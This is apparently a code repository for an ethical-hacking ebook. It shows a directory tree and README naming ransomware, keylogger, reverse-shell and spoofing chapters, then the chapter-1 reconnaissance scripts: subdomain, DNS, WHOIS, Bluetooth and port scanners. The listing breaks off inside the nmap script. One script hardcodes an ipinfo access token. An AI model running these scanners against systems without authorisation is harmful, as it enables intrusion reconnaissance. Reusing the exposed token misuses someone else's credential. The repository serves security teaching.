├── LICENSE ├── README.md ├── chapter-1 ├── bluetooth-scanner │ ├── bluetooth_scanner.py │ └── requirements.txt ├── domain-names │ ├── dns_enumeration.py │ ├── domain_info_extractor.py │ ├── domain_validator.py │ ├── domain_whois.py │ ├── fast_subdomain_scanner.py │ ├── google.com-subdomains.txt │ ├── requirements.txt │ ├── subdomain_scanner.py │ └── subdomains.txt ├── geolocation │ ├── get_ip_info.py │ └── requirements.txt ├── port-scanning │ ├── fast_port_scanner.py │ ├── nmap_port_scanner.py │ ├── port_scanner.py │ └── requirements.txt ├── reverse-dns-lookup │ ├── requirements.txt │ ├── reverse_dns_lookup_using_socket.py │ └── reverse_dns_lookup_using_viewdns.py └── username-search-tool │ ├── README.md │ ├── requirements.txt │ └── username_search_custom.py ├── chapter-2 ├── advanced-reverse-shell │ ├── client.py │ ├── notes.txt │ ├── requirements.txt │ └── server.py ├── fork-bomb │ ├── README.md │ ├── end_python_processes.py │ ├── fork_bomb.py │ ├── fork_bomb_simplest.py │ └── terminal_spawn_bomb.py ├── keylogger │ ├── keylogger.py │ └── requirements.txt ├── persistent-malware │ └── persistent_malware.py ├── ransomware │ ├── ransomware.py │ ├── requirements.txt │ └── test-folder │ │ ├── Documents │ │ ├── free-Chapter 1_ Introduction-to-PDF-Processing-in-Python.pdf │ │ └── free-Chapter_2_Building_Malware.pdf │ │ ├── Files │ │ ├── Archive │ │ │ └── my-archive.zip │ │ └── Programs │ │ │ └── 7z2107-x64.exe │ │ ├── Pictures │ │ ├── cat face flat.jpg │ │ └── cute_dog_flat_light.png │ │ ├── test.txt │ │ ├── test2.txt │ │ └── test3.txt └── simple-reverse-shell │ ├── client.py │ └── server.py ├── chapter-3 ├── cracking │ ├── bruteforce-ftp │ │ ├── bruteforce_ftp.py │ │ ├── requirements.txt │ │ └── wordlist.txt │ ├── bruteforce-ssh │ │ ├── bruteforce_ssh.py │ │ └── requirements.txt │ ├── hash-cracker │ │ ├── benchmark_speed.py │ │ ├── crack_hashes.py │ │ ├── requirements.txt │ │ ├── simple_hashing.py │ │ └── wordlist.txt │ ├── pdf-cracker │ │ ├── foo-protected.pdf │ │ ├── pdf_cracker_pikepdf.py │ │ ├── pdf_cracker_pymupdf.py │ │ └── requirements.txt │ └── zip-cracker │ │ ├── requirements.txt │ │ ├── secret.zip │ │ └── zip_cracker.py ├── locking-files │ ├── files │ │ ├── example.pdf │ │ ├── image.jpg │ │ ├── locked_example.pdf │ │ └── secure_example.zip │ ├── locking_pdf.py │ ├── locking_zip.py │ └── requirements.txt ├── password-evaluator │ ├── password_evaluator.py │ ├── password_strength_evaluator.py │ ├── requirements.txt │ └── using_zxcvbn.py ├── passwordgenerator │ └── password_generator.py └── wordlist-generator │ ├── ab.txt │ ├── aeiou.txt │ └── wordlist_generator.py ├── chapter-4 ├── extract-chrome-data │ ├── chrome_cookie.py │ ├── chromepass.py │ ├── credentials.txt │ ├── deletepass.py │ └── requirements.txt ├── extract-metadata-from-files │ ├── files │ │ ├── cleaned_example.docx │ │ ├── cleaned_example.pdf │ │ ├── cleaned_image.jpg │ │ ├── example.docx │ │ ├── example.pdf │ │ └── image.jpg │ ├── metadata.py │ └── requirements.txt ├── extract-wifi-passwords │ ├── extract_wifi_passwords.py │ └── output.md ├── fake-data-generation │ ├── generate_fake_data.py │ └── requirements.txt ├── file-integrity │ ├── README.md │ ├── example.txt │ └── verify_file_integrity.py ├── mac-address-changer │ ├── mac_address_changer_linux.py │ ├── mac_address_changer_windows.py │ └── requirements.txt ├── remove-metadata │ ├── files │ │ ├── cleaned_example.docx │ │ ├── cleaned_example.pdf │ │ ├── example.docx │ │ └── example.pdf │ ├── remove_metadata_from_docx.py │ ├── remove_metadata_from_images.py │ ├── remove_metadata_from_media.py │ ├── remove_metadata_from_pdf.py │ └── requirements.txt └── steganography │ ├── requirements.txt │ └── steganography.py ├── chapter-5 ├── advanced-network-scanner │ ├── advanced_network_scanner.py │ ├── notes.md │ └── requirements.txt ├── arp-spoof │ ├── arp_spoof.py │ ├── output.md │ ├── requirements.txt │ └── services.py ├── detect-arp-spoof │ ├── arp_spoof_detector.py │ └── requirements.txt ├── dhcp-listener │ ├── dhcp_listener.py │ ├── output.md │ └── requirements.txt ├── disconnect-devices │ ├── network_kicker.py │ ├── output.md │ └── requirements.txt ├── dns-spoof │ ├── dns_spoofer.py │ └── requirements.txt ├── fake-access-points │ ├── fake_access_points_forger.py │ ├── output.md │ └── simple_fake_access_point_forger.py ├── inject-code-onto-http │ ├── code_injector.py │ ├── output.md │ └── requirements.txt ├── network-scanner │ ├── output.md │ ├── requirements.txt │ └── simple_network_scanner.py ├── sniff-http-packets │ ├── output.md │ ├── requirements.txt │ └── sniff_http.py ├── syn-flood │ ├── output.md │ ├── requirements.txt │ └── syn_flood.py └── wifi-scanner │ ├── output.md │ ├── requirements.txt │ └── wifi_scanner.py └── chapter-6 └── email-spider ├── Screenshot.jpg ├── advanced_email_spider.py ├── email_harvester.py └── requirements.txt /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Rockikz 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Tools & Scripts Built in the [Ethical Hacking with Python EBook](https://www.thepythoncode.com/ethical-hacking-with-python-ebook) 2 | 3 | The tools and scripts are built in the [Ethical Hacking with Python Ebook](https://www.thepythoncode.com/ethical-hacking-with-python-ebook). 4 | 5 | More Python programs will be added to this repository as the book will be constantly improved and enriched. 6 | 7 | Each of the tools and scripts is in a separate folder containing the `requirements.txt` to be installed via the following command: 8 | ``` 9 | pip install -r requirements.txt 10 | ``` 11 | The tools and scripts are: 12 | ## Chapter 1: [Information Gathering](chapter-1/) 13 | - [Extracting Domain Name Info & Subdomain Scanner](chapter-1/domain-names/) 14 | - [Reverse DNS Lookup](chapter-1/reverse-dns-lookup/) 15 | - [Geolocating IP Addresses](chapter-1/geolocation/) 16 | - [Port Scanning](chapter-1/port-scanning/) 17 | - [Username Search Tool](chapter-1/username-search-tool/) 18 | - [Bluetooth Scanner](chapter-1/bluetooth-scanner/) 19 | ## Chapter 2: [Building Malware](chapter-2/) 20 | - [Making a Ransomware](chapter-2/ransomware/) 21 | - [Making a Keylogger](chapter-2/keylogger/) 22 | - [Making a Fork Bomb](chapter-2/fork-bomb/) 23 | - [Making a Reverse Shell](chapter-2/simple-reverse-shell/) 24 | - [Making an Advanced Reverse Shell](chapter-2/advanced-reverse-shell/) 25 | - [Making Malware Persistence](chapter-2/persistent-malware/) 26 | ## Chapter 3: [Building Password Crackers](chapter-3/) 27 | - [Wordlist Generator](chapter-3/wordlist-generator/) 28 | - [Locking PDF/ZIP Files with Passwords](chapter-3/locking-files/) 29 | - [Cracking ZIP Files](chapter-3/cracking/zip-cracker/) 30 | - [Cracking PDF Files](chapter-3/cracking/pdf-cracker/) 31 | - [Bruteforcing SSH Servers](chapter-3/cracking/bruteforce-ssh/) 32 | - [Bruteforcing FTP Servers](chapter-3/cracking/bruteforce-ftp/) 33 | - [Cryptographic Hashes](chapter-3/cracking/hash-cracker/) 34 | - [Making a Password Generator](chapter-3/passwordgenerator/) 35 | - [Checking Password Strength](chapter-3/password-evaluator/) 36 | ## Chapter 4: [Forensic Investigations](chapter-4/) 37 | - [Extracting Metadata from Files](chapter-4/extract-metadata-from-files/) 38 | - [Extracting PDF Metadata](chapter-4/extract-metadata-from-files/) 39 | - [Extracting Image Metadata](chapter-4/extract-metadata-from-files/) 40 | - [Extracting Audio/Video Metadata](chapter-4/extract-metadata-from-files/) 41 | - [Extracting Docx Metadata](chapter-4/extract-metadata-from-files/) 42 | - [Removing Metadata from Files](chapter-4/remove-metadata/) 43 | - [Removing Metadata from PDF Files](chapter-4/remove-metadata/) 44 | - [Removing Metadata from Image Files](chapter-4/remove-metadata/) 45 | - [Removing Metadata from Audio/Video Files](chapter-4/remove-metadata/) 46 | - [Removing Metadata from Docx Files](chapter-4/remove-metadata/) 47 | - [Extracting Passwords from Chrome Browser](chapter-4/extract-chrome-data/) 48 | - [Extracting Cookies from Chrome Browser](chapter-4/extract-chrome-data/) 49 | - [Hiding Data in Images](chapter-4/steganography/) 50 | - [Verifying File Integrity](chapter-4/file-integrity/) 51 | - [Changing your MAC Address](chapter-4/mac-address-changer/) 52 | - [Extracting Saved Wi-Fi Passwords](chapter-4/extract-wifi-passwords/) 53 | - [Generating Fake Data](chapter-4/fake-data-generation/) 54 | ## Chapter 5: [Packet Manipulation using Scapy](chapter-5/) 55 | - [DHCP Listener](chapter-5/dhcp-listener/) 56 | - [Network Scanner](chapter-5/network-scanner/) 57 | - [Wi-Fi Scanner](chapter-5/wifi-scanner/) 58 | - [SYN Flooding Attack](chapter-5/syn-flood) 59 | - [Creating Fake Access Points](chapter-5/fake-access-points/) 60 | - [Disconnecting Devices](chapter-5/disconnect-devices/) 61 | - [ARP Spoofing](chapter-5/arp-spoof/) 62 | - [Detecting ARP Spoofing](chapter-5/detect-arp-spoof/) 63 | - [DNS Spoofing](chapter-5/dns-spoof/) 64 | - [Sniffing HTTP Packets](chapter-5/sniff-http-packets/) 65 | - [Injecting Code into HTTP Responses](chapter-5/inject-code-onto-http/) 66 | - [Advanced Network Scanner](chapter-5/advanced-network-scanner/) 67 | ## Chapter 6: [Extracting Email Addresses from the Web](chapter-6/) 68 | - [Building a Simple Email Extractor](chapter-6/email-spider/) 69 | - [Building an Advanced Email Spider](chapter-6/email-spider/) 70 | -------------------------------------------------------------------------------- /chapter-1/bluetooth-scanner/bluetooth_scanner.py: -------------------------------------------------------------------------------- 1 | import bluetooth 2 | 3 | # Major and Minor Device Class definitions based on Bluetooth specifications 4 | MAJOR_CLASSES = { 5 | 0: "Miscellaneous", 6 | 1: "Computer", 7 | 2: "Phone", 8 | 3: "LAN/Network Access", 9 | 4: "Audio/Video", 10 | 5: "Peripheral", 11 | 6: "Imaging", 12 | 7: "Wearable", 13 | 8: "Toy", 14 | 9: "Health", 15 | 10: "Uncategorized" 16 | } 17 | 18 | MINOR_CLASSES = { 19 | # Computer Major Class 20 | (1, 0): "Uncategorized Computer", (1, 1): "Desktop Workstation", 21 | (1, 2): "Server-class Computer", (1, 3): "Laptop", (1, 4): "Handheld PC/PDA", 22 | (1, 5): "Palm-sized PC/PDA", (1, 6): "Wearable computer", 23 | # Phone Major Class 24 | (2, 0): "Uncategorized Phone", (2, 1): "Cellular", (2, 2): "Cordless", 25 | (2, 3): "Smartphone", (2, 4): "Wired modem or voice gateway", 26 | (2, 5): "Common ISDN Access", 27 | # LAN/Network Access Major Class 28 | (3, 0): "Fully available", (3, 1): "1% to 17% utilized", 29 | (3, 2): "17% to 33% utilized", (3, 3): "33% to 50% utilized", 30 | (3, 4): "50% to 67% utilized", (3, 5): "67% to 83% utilized", 31 | (3, 6): "83% to 99% utilized", (3, 7): "No service available", 32 | # Audio/Video Major Class 33 | (4, 0): "Uncategorized A/V", (4, 1): "Wearable Headset", (4, 2): "Hands-free Device", 34 | (4, 3): "Microphone", (4, 4): "Loudspeaker", (4, 5): "Headphones", (4, 6): "Portable Audio", 35 | (4, 7): "Car audio", (4, 8): "Set-top box", (4, 9): "HiFi Audio Device", 36 | (4, 10): "VCR", (4, 11): "Video Camera", (4, 12): "Camcorder", 37 | (4, 13): "Video Monitor", (4, 14): "Video Display and Loudspeaker", 38 | (4, 15): "Video Conferencing", (4, 16): "Gaming/Toy", 39 | # Peripheral Major Class 40 | (5, 0): "Not Keyboard/Not Pointing Device", (5, 1): "Keyboard", 41 | (5, 2): "Pointing device", (5, 3): "Combo Keyboard/Pointing device", 42 | # Imaging Major Class 43 | (6, 0): "Display", (6, 1): "Camera", (6, 2): "Scanner", (6, 3): "Printer", 44 | # Wearable Major Class 45 | (7, 0): "Wristwatch", (7, 1): "Pager", (7, 2): "Jacket", 46 | (7, 3): "Helmet", (7, 4): "Glasses", 47 | # Toy Major Class 48 | (8, 0): "Robot", (8, 1): "Vehicle", 49 | (8, 2): "Doll / Action figure", 50 | (8, 3): "Controller", (8, 4): "Game", 51 | # Health Major Class 52 | (9, 0): "Undefined", (9, 1): "Blood Pressure Monitor", 53 | (9, 2): "Thermometer", (9, 3): "Weighing Scale", 54 | (9, 4): "Glucose Meter", (9, 5): "Pulse Oximeter", 55 | (9, 6): "Heart/Pulse Rate Monitor", (9, 7): "Health Data Display", 56 | (9, 8): "Step Counter", (9, 9): "Body Composition Analyzer", 57 | (9, 10): "Peak Flow Monitor", (9, 11): "Medication Monitor", 58 | (9, 12): "Knee Prosthesis", (9, 13): "Ankle Prosthesis", 59 | # More specific definitions can be added if needed 60 | } 61 | 62 | def parse_device_class(device_class): 63 | major = (device_class >> 8) & 0x1F # divide by 2**8 and mask with 0x1F (take the last 5 bits) 64 | minor = (device_class >> 2) & 0x3F # divide by 2**2 and mask with 0x3F (take the last 6 bits) 65 | major_class_name = MAJOR_CLASSES.get(major, "Unknown Major Class") 66 | minor_class_key = (major, minor) 67 | minor_class_name = MINOR_CLASSES.get(minor_class_key, "Unknown Minor Class") 68 | return major_class_name, minor_class_name 69 | 70 | def scan_bluetooth_devices(): 71 | try: 72 | discovered_devices = bluetooth.discover_devices(duration=8, lookup_names=True, lookup_class=True) 73 | print('[!] Scanning for Bluetooth devices...') 74 | print(f"[!] Found {len(discovered_devices)} Devices") 75 | for addr, name, device_class in discovered_devices: 76 | major_class, minor_class = parse_device_class(device_class) 77 | print(f"[+] Device Name: {name}") 78 | print(f" Address: {addr}") 79 | print(f" Device Class: {device_class} ({major_class}, {minor_class})") 80 | except Exception as e: 81 | print(f"[ERROR] An error occurred: {e}") 82 | 83 | if __name__ == "__main__": 84 | scan_bluetooth_devices() 85 | -------------------------------------------------------------------------------- /chapter-1/bluetooth-scanner/requirements.txt: -------------------------------------------------------------------------------- 1 | pybluez -------------------------------------------------------------------------------- /chapter-1/domain-names/dns_enumeration.py: -------------------------------------------------------------------------------- 1 | import dns.resolver 2 | 3 | # Set the target domain and record type 4 | target_domain = "thepythoncode.com" 5 | record_types = ["A", "AAAA", "CNAME", "MX", "NS", "SOA", "TXT"] 6 | 7 | # Create a DNS resolver 8 | resolver = dns.resolver.Resolver() 9 | 10 | for record_type in record_types: 11 | # Perform DNS lookup for the target domain and record type 12 | try: 13 | answers = resolver.resolve(target_domain, record_type) 14 | except dns.resolver.NoAnswer: 15 | continue 16 | 17 | # Print the DNS records found 18 | print(f"DNS records for {target_domain} ({record_type}):") 19 | for rdata in answers: 20 | print(rdata) 21 | -------------------------------------------------------------------------------- /chapter-1/domain-names/domain_info_extractor.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import whois 3 | import dns.resolver 4 | import argparse 5 | 6 | 7 | def is_registered(domain_name): 8 | """ 9 | A function that returns a boolean indicating 10 | whether a `domain_name` is registered 11 | """ 12 | try: 13 | w = whois.whois(domain_name) 14 | except Exception: 15 | return False 16 | else: 17 | return bool(w.domain_name) 18 | 19 | 20 | def get_discovered_subdomains(domain, subdomain_list, timeout=2): 21 | # a list of discovered subdomains 22 | discovered_subdomains = [] 23 | for subdomain in subdomain_list: 24 | # construct the url 25 | url = f"http://{subdomain}.{domain}" 26 | try: 27 | # if this raises a connection error, that means the subdomain does not exist 28 | requests.get(url, timeout=timeout) 29 | except requests.ConnectionError: 30 | # if the subdomain does not exist, just pass, print nothing 31 | pass 32 | else: 33 | print("[+] Discovered subdomain:", url) 34 | # append the discovered subdomain to our list 35 | discovered_subdomains.append(url) 36 | 37 | return discovered_subdomains 38 | 39 | def resolve_dns_records(target_domain): 40 | """A function that resolves DNS records for a `target_domain`""" 41 | # List of record types to resolve 42 | record_types = ["A", "AAAA", "CNAME", "MX", "NS", "SOA", "TXT"] 43 | # Create a DNS resolver 44 | resolver = dns.resolver.Resolver() 45 | for record_type in record_types: 46 | # Perform DNS lookup for the target domain and record type 47 | try: 48 | answers = resolver.resolve(target_domain, record_type) 49 | except dns.resolver.NoAnswer: 50 | continue 51 | # Print the DNS records found 52 | print(f"DNS records for {target_domain} ({record_type}):") 53 | for rdata in answers: 54 | print(rdata) 55 | 56 | if __name__ == "__main__": 57 | parser = argparse.ArgumentParser(description="Domain name information extractor, uses WHOIS db and scans for subdomains") 58 | parser.add_argument("domain", help="The domain name without http(s)") 59 | parser.add_argument("-t", "--timeout", type=int, default=2, 60 | help="The timeout in seconds for prompting the connection, default is 2") 61 | parser.add_argument("-s", "--subdomains", default="subdomains.txt", 62 | help="The file path that contains the list of subdomains to scan, default is subdomains.txt") 63 | parser.add_argument("-o", "--output", 64 | help="The output file path resulting the discovered subdomains, default is {domain}-subdomains.txt") 65 | 66 | # parse the command-line arguments 67 | args = parser.parse_args() 68 | if is_registered(args.domain): 69 | whois_info = whois.whois(args.domain) 70 | # print the registrar 71 | print("Domain registrar:", whois_info.registrar) 72 | # print the WHOIS server 73 | print("WHOIS server:", whois_info.whois_server) 74 | # get the creation time 75 | print("Domain creation date:", whois_info.creation_date) 76 | # get expiration date 77 | print("Expiration date:", whois_info.expiration_date) 78 | # print all other info 79 | print(whois_info) 80 | print("="*50, "DNS records", "="*50) 81 | resolve_dns_records(args.domain) 82 | print("="*50, "Scanning subdomains", "="*50) 83 | # read all subdomains 84 | with open(args.subdomains) as file: 85 | # read all content 86 | content = file.read() 87 | # split by new lines 88 | subdomains = content.splitlines() 89 | discovered_subdomains = get_discovered_subdomains(args.domain, subdomains) 90 | # make the discovered subdomains filename dependant on the domain 91 | discovered_subdomains_file = f"{args.domain}-subdomains.txt" 92 | # save the discovered subdomains into a file 93 | with open(discovered_subdomains_file, "w") as f: 94 | for subdomain in discovered_subdomains: 95 | print(subdomain, file=f) -------------------------------------------------------------------------------- /chapter-1/domain-names/domain_validator.py: -------------------------------------------------------------------------------- 1 | import whois # pip install python-whois 2 | 3 | def is_registered(domain_name): 4 | """ 5 | A function that returns a boolean indicating 6 | whether a `domain_name` is registered 7 | """ 8 | try: 9 | w = whois.whois(domain_name) 10 | except Exception: 11 | return False 12 | else: 13 | return bool(w.domain_name) 14 | 15 | 16 | if __name__ == "__main__": 17 | print(is_registered("google.com")) 18 | print(is_registered("something-that-do-not-exist.com")) -------------------------------------------------------------------------------- /chapter-1/domain-names/domain_whois.py: -------------------------------------------------------------------------------- 1 | import whois 2 | from domain_validator import is_registered 3 | 4 | domain_name = "google.com" 5 | if is_registered(domain_name): 6 | whois_info = whois.whois(domain_name) 7 | # print the registrar 8 | print("Domain registrar:", whois_info.registrar) 9 | # print the WHOIS server 10 | print("WHOIS server:", whois_info.whois_server) 11 | # get the creation time 12 | print("Domain creation date:", whois_info.creation_date) 13 | # get expiration date 14 | print("Expiration date:", whois_info.expiration_date) 15 | # print all other info 16 | print(whois_info) -------------------------------------------------------------------------------- /chapter-1/domain-names/fast_subdomain_scanner.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from threading import Thread, Lock 3 | from queue import Queue 4 | 5 | q = Queue() 6 | list_lock = Lock() 7 | discovered_domains = [] 8 | 9 | def scan_subdomains(domain): 10 | global q 11 | while True: 12 | # get the subdomain from the queue 13 | subdomain = q.get() 14 | # scan the subdomain 15 | url = f"http://{subdomain}.{domain}" 16 | try: 17 | requests.get(url) 18 | except requests.ConnectionError: 19 | pass 20 | else: 21 | print("[+] Discovered subdomain:", url) 22 | # add the subdomain to the global list 23 | with list_lock: 24 | discovered_domains.append(url) 25 | 26 | # we're done with scanning that subdomain 27 | q.task_done() 28 | 29 | 30 | def main(domain, n_threads, subdomains): 31 | global q 32 | 33 | # fill the queue with all the subdomains 34 | for subdomain in subdomains: 35 | q.put(subdomain) 36 | 37 | for t in range(n_threads): 38 | # start all threads 39 | worker = Thread(target=scan_subdomains, args=(domain,)) 40 | # daemon thread means a thread that will end when the main thread ends 41 | worker.daemon = True 42 | worker.start() 43 | 44 | 45 | if __name__ == "__main__": 46 | import argparse 47 | parser = argparse.ArgumentParser(description="Faster Subdomain Scanner using Threads") 48 | parser.add_argument("domain", help="Domain to scan for subdomains without protocol (e.g without 'http://' or 'https://')") 49 | parser.add_argument("-l", "--wordlist", help="File that contains all subdomains to scan, line by line. Default is subdomains.txt", 50 | default="subdomains.txt") 51 | parser.add_argument("-t", "--num-threads", help="Number of threads to use to scan the domain. Default is 10", default=10, type=int) 52 | parser.add_argument("-o", "--output-file", help="Specify the output text file to write discovered subdomains", default="discovered-subdomains.txt") 53 | 54 | args = parser.parse_args() 55 | domain = args.domain 56 | wordlist = args.wordlist 57 | num_threads = args.num_threads 58 | output_file = args.output_file 59 | 60 | main(domain=domain, n_threads=num_threads, subdomains=open(wordlist).read().splitlines()) 61 | q.join() 62 | 63 | # save the file 64 | with open(output_file, "w") as f: 65 | for url in discovered_domains: 66 | print(url, file=f) -------------------------------------------------------------------------------- /chapter-1/domain-names/google.com-subdomains.txt: -------------------------------------------------------------------------------- 1 | http://www.google.com 2 | http://mail.google.com 3 | http://m.google.com 4 | http://blog.google.com 5 | http://admin.google.com 6 | http://news.google.com 7 | http://support.google.com 8 | http://mobile.google.com 9 | http://docs.google.com 10 | http://calendar.google.com 11 | http://web.google.com 12 | http://email.google.com 13 | http://images.google.com 14 | http://video.google.com 15 | http://api.google.com 16 | http://search.google.com 17 | http://chat.google.com 18 | http://wap.google.com 19 | http://sites.google.com 20 | http://ads.google.com 21 | http://apps.google.com 22 | http://download.google.com 23 | http://store.google.com 24 | http://files.google.com 25 | http://sms.google.com 26 | http://ipv4.google.com 27 | -------------------------------------------------------------------------------- /chapter-1/domain-names/requirements.txt: -------------------------------------------------------------------------------- 1 | python-whois 2 | requests 3 | dnspython -------------------------------------------------------------------------------- /chapter-1/domain-names/subdomain_scanner.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | # the domain to scan for subdomains 4 | domain = "thepythoncode.com" 5 | 6 | # read all subdomains 7 | with open("subdomains.txt") as file: 8 | # read all content 9 | content = file.read() 10 | # split by new lines 11 | subdomains = content.splitlines() 12 | 13 | # a list of discovered subdomains 14 | discovered_subdomains = [] 15 | for subdomain in subdomains: 16 | # construct the url 17 | url = f"http://{subdomain}.{domain}" 18 | try: 19 | # if this raises an ERROR, that means the subdomain does not exist 20 | requests.get(url, timeout=2) 21 | except requests.ConnectionError: 22 | # if the subdomain does not exist, just pass, print nothing 23 | pass 24 | else: 25 | print("[+] Discovered subdomain:", url) 26 | # append the discovered subdomain to our list 27 | discovered_subdomains.append(url) 28 | 29 | # save the discovered subdomains into a file 30 | with open("discovered_subdomains.txt", "w") as f: 31 | for subdomain in discovered_subdomains: 32 | print(subdomain, file=f) -------------------------------------------------------------------------------- /chapter-1/domain-names/subdomains.txt: -------------------------------------------------------------------------------- 1 | www 2 | mail 3 | ftp 4 | localhost 5 | webmail 6 | smtp 7 | pop 8 | ns1 9 | webdisk 10 | ns2 11 | cpanel 12 | whm 13 | autodiscover 14 | autoconfig 15 | m 16 | imap 17 | test 18 | ns 19 | blog 20 | pop3 21 | dev 22 | www2 23 | admin 24 | forum 25 | news 26 | vpn 27 | ns3 28 | mail2 29 | new 30 | mysql 31 | old 32 | lists 33 | support 34 | mobile 35 | mx 36 | static 37 | docs 38 | beta 39 | shop 40 | sql 41 | secure 42 | demo 43 | cp 44 | calendar 45 | wiki 46 | web 47 | media 48 | email 49 | images 50 | img 51 | www1 52 | intranet 53 | portal 54 | video 55 | sip 56 | dns2 57 | api 58 | cdn 59 | stats 60 | dns1 61 | ns4 62 | www3 63 | dns 64 | search 65 | staging 66 | server 67 | mx1 68 | chat 69 | wap 70 | my 71 | svn 72 | mail1 73 | sites 74 | proxy 75 | ads 76 | host 77 | crm 78 | cms 79 | backup 80 | mx2 81 | lyncdiscover 82 | info 83 | apps 84 | download 85 | remote 86 | db 87 | forums 88 | store 89 | relay 90 | files 91 | newsletter 92 | app 93 | live 94 | owa 95 | en 96 | start 97 | sms 98 | office 99 | exchange 100 | ipv4 -------------------------------------------------------------------------------- /chapter-1/geolocation/get_ip_info.py: -------------------------------------------------------------------------------- 1 | import ipinfo 2 | import sys 3 | 4 | # get the ip address from the command line 5 | try: 6 | ip_address = sys.argv[1] 7 | except IndexError: 8 | ip_address = None 9 | 10 | # access token for ipinfo.io, pur yours here 11 | access_token = '09d8c3fe6f8ed9' 12 | # create a client object with the access token 13 | handler = ipinfo.getHandler(access_token) 14 | # get the ip info 15 | details = handler.getDetails(ip_address) 16 | # print the ip info 17 | for key, value in details.all.items(): 18 | print(f"{key}: {value}") -------------------------------------------------------------------------------- /chapter-1/geolocation/requirements.txt: -------------------------------------------------------------------------------- 1 | ipinfo -------------------------------------------------------------------------------- /chapter-1/port-scanning/fast_port_scanner.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | import socket # for connecting 3 | from colorama import init, Fore 4 | 5 | from threading import Thread, Lock 6 | from queue import Queue 7 | 8 | # some colors 9 | init() 10 | GREEN = Fore.GREEN 11 | RESET = Fore.RESET 12 | GRAY = Fore.LIGHTBLACK_EX 13 | 14 | # number of threads, feel free to tune this parameter as you wish 15 | N_THREADS = 200 16 | # thread queue 17 | q = Queue() 18 | print_lock = Lock() 19 | 20 | def port_scan(port): 21 | """ 22 | Scan a port on the global variable `host` 23 | """ 24 | try: 25 | s = socket.socket() 26 | s.connect((host, port)) 27 | except: 28 | with print_lock: 29 | print(f"{GRAY}{host:15}:{port:5} is closed {RESET}", end='\r') 30 | else: 31 | with print_lock: 32 | print(f"{GREEN}{host:15}:{port:5} is open {RESET}") 33 | finally: 34 | s.close() 35 | 36 | 37 | def scan_thread(): 38 | global q 39 | while True: 40 | # get the port number from the queue 41 | worker = q.get() 42 | # scan that port number 43 | port_scan(worker) 44 | # tells the queue that the scanning for that port 45 | # is done 46 | q.task_done() 47 | 48 | 49 | def main(host, ports): 50 | global q 51 | for t in range(N_THREADS): 52 | # for each thread, start it 53 | t = Thread(target=scan_thread) 54 | # when we set daemon to true, that thread will end when the main thread ends 55 | t.daemon = True 56 | # start the daemon thread 57 | t.start() 58 | 59 | for worker in ports: 60 | # for each port, put that port into the queue 61 | # to start scanning 62 | q.put(worker) 63 | 64 | # wait the threads ( port scanners ) to finish 65 | q.join() 66 | 67 | 68 | if __name__ == "__main__": 69 | # parse some parameters passed 70 | parser = argparse.ArgumentParser(description="Simple port scanner") 71 | parser.add_argument("host", help="Host to scan.") 72 | parser.add_argument("--ports", "-p", dest="port_range", default="1-65535", help="Port range to scan, default is 1-65535 (all ports)") 73 | args = parser.parse_args() 74 | host, port_range = args.host, args.port_range 75 | 76 | start_port, end_port = port_range.split("-") 77 | start_port, end_port = int(start_port), int(end_port) 78 | 79 | ports = [ p for p in range(start_port, end_port)] 80 | 81 | main(host, ports) -------------------------------------------------------------------------------- /chapter-1/port-scanning/nmap_port_scanner.py: -------------------------------------------------------------------------------- 1 | import nmap 2 | import sys 3 | 4 | # get the target host(s) from the command-line arguments 5 | target = sys.argv[1] 6 | # initialize the Nmap port scanner 7 | nm = nmap.PortScanner() 8 | print("[*] Scanning...") 9 | # scanning my router 10 | nm.scan(target) 11 | # get scan statistics 12 | scan_stats = nm.scanstats() 13 | print(f"[{scan_stats['timestr']}] Elapsed: {scan_stats['elapsed']}s " \ 14 | f"Up hosts: {scan_stats['uphosts']} Down hosts: {scan_stats['downhosts']} " \ 15 | f"Total hosts: {scan_stats['totalhosts']}") 16 | 17 | equivalent_commandline = nm.command_line() 18 | print(f"[*] Equivalent command: {equivalent_commandline}") 19 | 20 | # get all the scanned hosts 21 | hosts = nm.all_hosts() 22 | for host in hosts: 23 | # get host name 24 | hostname = nm[host].hostname() 25 | # get the addresses 26 | addresses = nm[host].get("addresses") 27 | # get the IPv4 28 | ipv4 = addresses.get("ipv4") 29 | # get the MAC address of this host 30 | mac_address = addresses.get("mac") 31 | # extract the vendor if available 32 | vendor = nm[host].get("vendor") 33 | # get the open TCP ports 34 | open_tcp_ports = nm[host].all_tcp() 35 | # get the open UDP ports 36 | open_udp_ports = nm[host].all_udp() 37 | # print details 38 | print("="*30, host, "="*30) 39 | print(f"Hostname: {hostname} IPv4: {ipv4} MAC: {mac_address}") 40 | print(f"Vendor: {vendor}") 41 | if open_tcp_ports or open_udp_ports: 42 | print("-"*30, "Ports Open", "-"*30) 43 | for tcp_port in open_tcp_ports: 44 | # get all the details available for the port 45 | port_details = nm[host].tcp(tcp_port) 46 | port_state = port_details.get("state") 47 | port_up_reason = port_details.get("reason") 48 | port_service_name = port_details.get("name") 49 | port_product_name = port_details.get("product") 50 | port_product_version = port_details.get("version") 51 | port_extrainfo = port_details.get("extrainfo") 52 | port_cpe = port_details.get("cpe") 53 | print(f" TCP Port: {tcp_port} Status: {port_state} Reason: {port_up_reason}") 54 | 